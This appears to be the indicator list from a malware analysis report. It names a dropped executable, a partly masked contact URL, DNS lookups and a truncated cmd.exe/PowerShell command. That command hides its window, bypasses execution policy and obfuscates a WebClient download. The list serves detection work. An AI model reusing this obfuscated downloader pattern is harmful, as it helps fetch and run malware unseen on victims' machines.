Technical information
- '%LOCALAPPDATA%\tempbin94.exe'
- %LOCALAPPDATA%\tempbin94.exe
- http://nu###gon.top/perik493/main.php
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK nu###gon.top
- DNS ASK in##l.com
- DNS ASK su####t.apple.com
- DNS ASK support.microsoft.com
- DNS ASK le####piret.best
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c kLZGqofunNeYcpv & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c kLZGqofunNeYcpv & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....